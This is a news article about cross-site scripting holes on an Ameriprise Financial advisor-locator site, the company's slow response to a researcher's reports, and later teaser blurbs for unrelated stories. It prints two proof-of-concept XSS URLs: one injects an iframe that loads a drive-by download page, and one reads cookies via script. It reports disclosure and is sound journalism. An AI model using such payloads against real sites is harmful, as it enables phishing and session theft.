Security bugs crawl all over financial giant’s website

Ameriprise let flaws fester for five months


For the past five months, a website for investment services giant Ameriprise Financial contained bugs that allowed even low-level criminals to inject malicious content into official company webpages and steal user's cookies, according to a web security expert.

The XSS, or cross-site scripting, flaws made it possible for phishers to send Ameriprise customers bona fide links to the Ameriprise website that opened pages that intermingled counterfeit content with legitimate text and graphics. The holes could also allow criminals to steal browser cookies used to authenticate online accounts.

In the five months since Russ McRee of HolisticInfoSec.org first identified the bugs, Ameriprise offered customers statements like this one, which assures visitors that "no one without the proper web browser configuration can view or modify information contained on our systems." And yet, not one of the half-dozen warnings McRee sent was answered.

"The reality is that not enough of these companies at that level, particularly in the financial sector, properly do intake for vulnerabilities," said McRee. "There should be something on their site that says 'If you see a security issue on our site, please report it.'"

It was only earlier this week that federal prosecutors revealed that another garden-variety web vulnerability, known as an SQL injection, was the chink that allowed Albert Gonzalez and other hackers the toehold they needed to steal more than 130 million credit card numbers from card processor Heartland Payment Systems and four other companies. Like SQL injection flaws, XSS vulnerabilities have been around for more than a decade and are routinely discounted as insignificant by many of the websites plagued by the bugs.

Indeed, Benjamin Pratt, Ameriprise’s vice president of public communications, played down the severity of the bugs brought to his attention, saying they affected only one portion of the company's site.

"It's an important point to note that none of our client data can be exposed by this," he said shortly after being alerted to the bug. "There's no one at risk here. Like any other vulnerability, we're aware of it and we're moving as quickly as we can to repair it."

He said Ameriprise officials have no way of verifying that the bugs were reported as long ago as March, but in any event he said that there are no plans to review any of the mechanisms the company may have in place to receive notifications from the public about website vulnerabilities.

"There are plenty of customer service and other phone numbers available on our website," he said. "I can't speak to that specific experience."

It's not the first time a major financial services company has been caught sitting on a bug that could undermine the security of its online customers. In December, web application developers fixed several XSS holes on the website of American Express, more than two and a half weeks after McRee reported them to company representatives.

That bug was particularly embarrassing because Amex is a founding member of the PCI Security Standards Council, the group that sets the rules governing the Payment Card Industry. According to the rules, sites that suffer from XSS vulnerabilities are not compliant with payment card industry data-security standards.

McRee provided three examples of the types of links. One of them looked like this:

http://locator.ameripriseadvisors.com/?zip=12345&x=15&y=14&page=results&solc_id=19819&vend_cd=ALA&offer_id=%22%3E%3Ciframe%20src=http://holisticinfosec.org/poc/drivebyDemo/driveby.php%20width=600%20height=400%3E

It caused browsers hitting the Ameriprise website to receive a popup window that prompted them to download an executable file.

Click to enlarge

A separate link…

http://locator.ameripriseadvisors.com/?zip=12345&x=15&y=14&page=results&solc_id=19819&vend_cd=ALA&offer_id=%22%3E%3CSCRIPT%3Ealert(document.cookie)%3C/SCRIPT%3E

...used JavaScript to access the cookie the website had set on the user's hard drive.

Click to enlarge

Both Internet Explorer version 8 and Firefox running the NoScript add-on were immune to the attacks, thanks to built-in safety mechanisms.

Such web-application flaws are often easy to fix because they require only a line or two of code to be changed. Sure enough, Ameriprise repaired its site less than two hours after The Register notified company representatives of the vulnerabilities. ®

Similar topics


Other stories you might like

  • Prisons transcribe private phone calls with inmates using speech-to-text AI

    Plus: A drug designed by machine learning algorithms to treat liver disease reaches human clinical trials and more

    In brief Prisons around the US are installing AI speech-to-text models to automatically transcribe conversations with inmates during their phone calls.

    A series of contracts and emails from eight different states revealed how Verus, an AI application developed by LEO Technologies and based on a speech-to-text system offered by Amazon, was used to eavesdrop on prisoners’ phone calls.

    In a sales pitch, LEO’s CEO James Sexton told officials working for a jail in Cook County, Illinois, that one of its customers in Calhoun County, Alabama, uses the software to protect prisons from getting sued, according to an investigation by the Thomson Reuters Foundation.

    Continue reading
  • Battlefield 2042: Please don't be the death knell of the franchise, please don't be the death knell of the franchise

    Another terrible launch, but DICE is already working on improvements

    The RPG Greetings, traveller, and welcome back to The Register Plays Games, our monthly gaming column. Since the last edition on New World, we hit level cap and the "endgame". Around this time, item duping exploits became rife and every attempt Amazon Games made to fix it just broke something else. The post-level 60 "watermark" system for gear drops is also infuriating and tedious, but not something we were able to address in the column. So bear these things in mind if you were ever tempted. On that note, it's time to look at another newly released shit show – Battlefield 2042.

    I wanted to love Battlefield 2042, I really did. After the bum note of the first-person shooter (FPS) franchise's return to Second World War theatres with Battlefield V (2018), I stupidly assumed the next entry from EA-owned Swedish developer DICE would be a return to form. I was wrong.

    The multiplayer military FPS market is dominated by two forces: Activision's Call of Duty (COD) series and EA's Battlefield. Fans of each franchise are loyal to the point of zealotry with little crossover between player bases. Here's where I stand: COD jumped the shark with Modern Warfare 2 in 2009. It's flip-flopped from WW2 to present-day combat and back again, tried sci-fi, and even the Battle Royale trend with the free-to-play Call of Duty: Warzone (2020), which has been thoroughly ruined by hackers and developer inaction.

    Continue reading
  • American diplomats' iPhones reportedly compromised by NSO Group intrusion software

    Reuters claims nine State Department employees outside the US had their devices hacked

    The Apple iPhones of at least nine US State Department officials were compromised by an unidentified entity using NSO Group's Pegasus spyware, according to a report published Friday by Reuters.

    NSO Group in an email to The Register said it has blocked an unnamed customers' access to its system upon receiving an inquiry about the incident but has yet to confirm whether its software was involved.

    "Once the inquiry was received, and before any investigation under our compliance policy, we have decided to immediately terminate relevant customers’ access to the system, due to the severity of the allegations," an NSO spokesperson told The Register in an email. "To this point, we haven’t received any information nor the phone numbers, nor any indication that NSO’s tools were used in this case."

    Continue reading

Biting the hand that feeds IT © 1998–2021